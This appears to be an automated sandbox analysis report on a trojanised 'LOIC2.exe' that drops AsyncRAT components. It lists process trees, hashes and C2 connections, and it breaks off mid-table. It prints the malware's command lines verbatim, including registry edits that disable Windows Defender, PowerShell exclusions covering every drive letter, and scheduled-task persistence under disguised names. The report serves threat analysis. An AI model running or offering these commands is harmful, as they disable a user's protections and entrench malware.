Analysis Overview
SHA256
f47616e1ab4fc52d125b91a94eef6e87f7589b5d664d3dcdaef7063d80149b64
Threat Level: Known bad
The file LOIC2.exe was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
MetaSploit
AsyncRat
Async RAT payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 22:13
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-19 22:13
Reported
2024-06-19 22:16
Platform
win11-20240508-en
Max time kernel
143s
Max time network
148s
Command Line
Signatures
AsyncRat
MetaSploit
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOlC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\COM Surrogate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\LOIC2.exe
"C:\Users\Admin\AppData\Local\Temp\LOIC2.exe"
C:\Users\Admin\AppData\Local\LOlC.exe
"C:\Users\Admin\AppData\Local\LOlC.exe"
C:\Users\Admin\AppData\Local\Runtime Broker.exe
"C:\Users\Admin\AppData\Local\Runtime Broker.exe"
C:\Users\Admin\AppData\Local\LOIC.exe
"C:\Users\Admin\AppData\Local\LOIC.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\LOlC.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7D5E.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Users\Admin\AppData\Roaming\COM Surrogate.exe
"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
"C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Windows\SYSTEM32\rundll32.exe
rundll32
Network
| Country | Destination | Domain | Proto |
| DE | 193.161.193.99:21265 | N/A | tcp |
| DE | 193.161.193.99:52695 | N/A | tcp |
| N/A | 127.0.0.1:3334 | N/A | tcp |
| N/A | 127.0.0.1:3334 | N/A | tcp |
| DE | 193.161.193.99:21265 | N/A | tcp |
| DE | 193.161.193.99:21265 | N/A | tcp |
| IE | 52.111.236.22:443 | N/A | tcp |
| DE | 193.161.193.99:21265 | N/A | tcp |
| N/A | 127.0.0.1:3334 | N/A | tcp |
| DE | 193.161.193.99:21265 | N/A | tcp |
Files
memory/3956-0-0x00000000004F0000-0x00000000009AE000-memory.dmp
memory/3956-1-0x00007FFA20DB3000-0x00007FFA20DB5000-memory.dmp
C:\Users\Admin\AppData\Local\LOlC.exe
| MD5 | e6b7d05c7a4369dd9112959795bb3521 |
| SHA1 | 80c60595def3cbb2d126e3c86c9a1b92572b55b7 |
| SHA256 | 10eb620d956a63295cd933a3bad5769b1f8b0eec8b3748569467c82fb61e295c |
| SHA512 | baa982104c839f9f0893dc2940b418fc64fcc9e964a2791c176f7e7795ee7732429287d84f5d37bea15882a6462eaa7f7996bf283a27a0718ee96054a396a806 |
C:\Users\Admin\AppData\Local\Runtime Broker.exe
| MD5 | 9c3ad681c33d3fb6934102a35cb7a2ad |
| SHA1 | d3630943b6af7b956eb459fc2e8f5137f2f5f8a1 |
| SHA256 | 9625d7f8c8ddded4818a03ec7912c0df6ce464a95eb055b01a15fe3aa373305b |
| SHA512 | ea310b840455b8279c72ccb8e45f27b6ec861baf66d223b584d790bdca6426b54729eb7c80163c8e6ce1e88044088c1167109be0cb9418935d70ef42a6bbd466 |
C:\Users\Admin\AppData\Local\LOIC.exe
| MD5 | e6fa3028cd03318496852718143d256f |
| SHA1 | 4c85973d612cd1955163c244c9c334d3a0c507cb |
| SHA256 | f60a52512773b52def9ba9ce8aad61144d2cf351f6bc04d1c5a13abef8f3b89b |
| SHA512 | 29089eccd1e670570fecafdd682f0ec13bc55fb17cdc0938ff4c6fd32c55c1919e26fad5b3ffed78217a94a9e8aba768cdf092ffc85f6ab19fbede0dc0fae0bb |
memory/1816-32-0x0000000000070000-0x0000000000086000-memory.dmp
memory/1680-37-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/1816-40-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qkqasfpu.gzp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4604-49-0x000001473C1F0000-0x000001473C212000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 437395ef86850fbff98c12dff89eb621 |
| SHA1 | 9cec41e230fa9839de1e5c42b7dbc8b31df0d69c |
| SHA256 | 9c39f3e1ee674a289926fddddfc5549740c488686ec6513f53848a225c192ba6 |
| SHA512 | bc669893f5c97e80a62fc3d15383ed7c62ffc86bc986401735903019bb96a5f13e4d0f6356baa2021267503a4eb62681e58e28fcff435350e83aa425fa76cd64 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1f8c0b83fd829b5fc0d0d02e03e18e0f |
| SHA1 | d17973f51bcd33c7b29d5723c23a0fa12c97ae08 |
| SHA256 | acde3af9279f0a05ba6ee73296ed0497aa4b571b58cfe3bbe8364cf442c0b7e9 |
| SHA512 | e4e1a5e053255e526c2f70085b6928799aac96a74378d440ffbd9fdaa4fdb7106a6d587b348d40ee16aa6769b8d5b28a4f9a4082d39cc9b13694813fd37ff88f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 190b28f40c0edd3cc08d0fd3aca4779a |
| SHA1 | 425b98532b6a18aa2baece47605f1cf6c8cfbd11 |
| SHA256 | 8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce |
| SHA512 | 8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b1c1fe85a9cd8fa09682d3ff82540ac5 |
| SHA1 | 85fa1d0d71c76d1cd02c59a928c582da1f39ddf5 |
| SHA256 | 6592c430c3d57a89177dd054c34d64b72e2c7ed73b93a854187809e48c3348c0 |
| SHA512 | bd131eaa683df3b099e69ca736a33bb9db19bd164caa9f2977b45b41da4d83654a6a69018d5ad343a45e8dd9d69a2a176848b35d2661d80330222c175d0bd122 |
memory/1816-86-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp7D5E.tmp.bat
| MD5 | c1d3f64b7e8f5f8cbd12a45c2a5235b0 |
| SHA1 | 4e8b3837a3a0fdb1f318f7f194c41ac15492fd36 |
| SHA256 | 77305a6f3847225c1e8e4e934016bc8873f85653a2f702d071dc310e9ee443ca |
| SHA512 | 3a2fcfb26c4efcb72016e4a2176874553534dfebf84e8f26c16aeba371501b9fd6a2c2a8c0657daf27d715fc0c598b85d7a75a6b81c358ee5677d27fa9e1d541 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4093e5ab3812960039eba1a814c2ffb0 |
| SHA1 | b5e4a98a80be72fccd3cc910e93113d2febef298 |
| SHA256 | c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c |
| SHA512 | f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 051a74485331f9d9f5014e58ec71566c |
| SHA1 | 4ed0256a84f2e95609a0b4d5c249bca624db8fe4 |
| SHA256 | 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888 |
| SHA512 | 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8cb7f4b4ab204cacd1af6b29c2a2042c |
| SHA1 | 244540c38e33eac05826d54282a0bfa60340d6a1 |
| SHA256 | 4994013dabe4f131d401879278eee147add6349124ea6452358dca7e2344c7a6 |
| SHA512 | 7651cb6863a425840db610253151e271d3e8da26a8c633ce484247266fa226792ecb84b9578df3ab17fef84a5dfcad417b63a7df59c9650a907e08d59b91dd6e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8082885362359f72fb414d2fa6ad357d |
| SHA1 | c6111820bcf1adf9ac4e8a441d984790465b6393 |
| SHA256 | 0b70605985f4148a236426049c44406110e9edc165a0501f636015a30340beef |
| SHA512 | b5d227b5ac6549566d7456616b98fe9aa62f6721be43a9e5674c35c2c9d218f7fec0fea978bdaff3ec73b6591c6e41efa8946526c2ab473da1c443a5a851a145 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a287707e1e76dd9e002b1961be29ad0 |
| SHA1 | 8ec256db90072b98064e986d58be4ffc7a04a4cf |
| SHA256 | c32cacc7309da41133879871e0c04b81c8349d9f04e73592327f05aeefedb304 |
| SHA512 | 08472fd732d9b491badc2519a73d2bc21031a8f72e4e910ec9f117b7feb2431f84e2620c6e3e9010038a4bbc599942421458d0732032411944dc6bec3fc1428c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34c8b93dd58a4703db0d6dd86bb21d70 |
| SHA1 | b53aa49b882070b857951b6638d6da3a03ac2f56 |
| SHA256 | 34b95e4d12196f68f7a030b98190fda89c34b696251ab9ed831e48d983896898 |
| SHA512 | bba4a86b8a66104ed21fd58717168cdf68b93c801a94ec65e25c2b66c1b9354b9e7c1c01cadde451948e072d96c3fa4994c94ef33aeff9b603e7b5d82f7111e7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4ae54c3a00d1d664f74bfd4f70c85332 |
| SHA1 | 67f3ed7aaea35153326c1f907c0334feef08484c |
| SHA256 | 1e56a98f74d4a604bef716b47ef730d88f93aec57a98c89aa4423394cbc95b5c |
| SHA512 | b3bbdefeaadbdaac00f23ce3389bbd3b565bd7e0079aeebf3e4afba892382e1cd3896c00bb2e5a98146ac593f9bdc5568d0bd08c5b0139f0814b1a38911c3889 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 30656d799f284f3a413497797da0ef69 |
| SHA1 | 0c3d4b17a36cc325cd7368612658fbcec6bdbae3 |
| SHA256 | 4ed53bbf3849f8a749d0938a29436fc3eb5971b578e6ade8a59b773de0765ee5 |
| SHA512 | 69c5870dd584d3aa854ed6e8f2c348d65df0cb45e1a7d4b0880cde115afe51d03e2104726ac3f35fd03a62c1ca8868d8b37350332b19d9d4ca171ec0af38620f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3c0fe86517be16d2b0a671148c0274d2 |
| SHA1 | bd7a487a037395e9ede9e76b4a455fdf386ba8db |
| SHA256 | 5f85aaa0472b8ae98352b7295cd59357e3e585b2299c540e9a8b5848a8d6b302 |
| SHA512 | 642bc58c0a5682b45056e837be0dc5d1cd8c400f0e73f20d17c19720fb1fdae132b86873100955e9d65f72f1d481704b84c30d440ca53898c6d6d6f106b74f0a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c48a9546f28fdfe1d6a35ac54de7c0e9 |
| SHA1 | 180eea6e33bedd72ae3b63907d7369f0c6e78b86 |
| SHA256 | fc6f268436f1e009439e1cd2333720b23d31e0e65b48f61072fb820a8782f672 |
| SHA512 | 9e18fa74caf08c75f8579bd8144452a3cc6e70490f6ad3c227a5143ea5c440871322bfef0c96f064031bb59861fbe709486706fd74a04b4bb96c4ed6db7b0d26 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 311174334b8e31fc10d28c4575e92688 |
| SHA1 | e2b2b2100f0445b4d37cd16f82d3cfcca3abf335 |
| SHA256 | 793aa8f317799c4ad031a7ba58960643c29f03a24b2baba577cc1ccdcbe46a76 |
| SHA512 | e7ddc1cf4443564bee7f00a66f2e533d1d89f6ab9434ea75ae7aeec4e8aa56ba40d27c81e472c92724fc892a7726232280274397d3506d95275af41337fc0135 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 69416944dac24129d0969e2ac46f0533 |
| SHA1 | d71969659956b32411e0606a9bee640a0b108ef4 |
| SHA256 | dffc7e01106427982d7cafd3d7e3be37e16b098fbb0958410ea8d7c68bfb97ca |
| SHA512 | aabb330053579af0d9de2661bd70eaadfd2e2e617759bc9c380db1c64731c6711304e49882138e9d337815377ee012a7458f91f692cb31538d73624385867f4c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 80707036df540b6657f9d443b449e3c3 |
| SHA1 | b3e7d5d97274942164bf93c8c4b8a9b68713f46f |
| SHA256 | 6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0 |
| SHA512 | 65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fea033e3f1e875a316dbf1edee8aa065 |
| SHA1 | aaa73783ca9a3553872a64c57c4b08c82d34b099 |
| SHA256 | 16586dcbfcc2e023da908d1b056637ccbe5d64bdc795b78011b1ce5f39b25601 |
| SHA512 | 12db71dc6f4fe3f672638ff998ac8d3e87ebb0ac569daa8fa2f62b8abff03eafcd4f5aba84d48031d4bde0118cf01cf705a674a8f04abf1a11bb740b9352f7f9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6f0e62045515b66d0a0105abc22dbf19 |
| SHA1 | 894d685122f3f3c9a3457df2f0b12b0e851b394c |
| SHA256 | 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319 |
| SHA512 | f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9dd876d6004f9e894c7d8de6ae950e5b |
| SHA1 | 48f0b4c5f0203788acdeceee62a69df0022dc8d4 |
| SHA256 | 6e19ea46b5d0c9d58c6fc3c6187e5b821f1600cc25d675d25c8fd829f7194344 |
| SHA512 | 3f5be2cb27900546eb791f5d5f1274c787f9a4645647b9943a5502c2167ec8a5d9ab653f2efc088d6ea6e8057b63caf3dce0a376f0b88d62f43b68bfa1518324 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cef328ddb1ee8916e7a658919323edd8 |
| SHA1 | a676234d426917535e174f85eabe4ef8b88256a5 |
| SHA256 | a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90 |
| SHA512 | 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb |
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
| MD5 | 1837aea22a774bde2cd2eca02b5995a0 |
| SHA1 | c00b11f612716a5b9f282264538ddc2e041d8981 |
| SHA256 | 3263283f59723e5487b128439d495da10b06f84a84793da717a35e0dd7e3b905 |
| SHA512 | 9f479883cae36152dd2d2bf55e35d2ab05783e214479d12b957d316e4d3c16b63d9dfaf11f3752f9831c182f7c4b06261849042999bac4544fed4011c9fad67b |
memory/3916-307-0x000002B9AC330000-0x000002B9AC331000-memory.dmp
memory/4576-308-0x00007FF75E880000-0x00007FF75ED07000-memory.dmp
memory/564-310-0x00007FF672780000-0x00007FF67286B000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 22:13
Reported
2024-06-19 22:14
Platform
win10-20240404-en
Max time kernel
41s
Max time network
47s
Command Line
Signatures
AsyncRat
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOlC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\COM Surrogate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
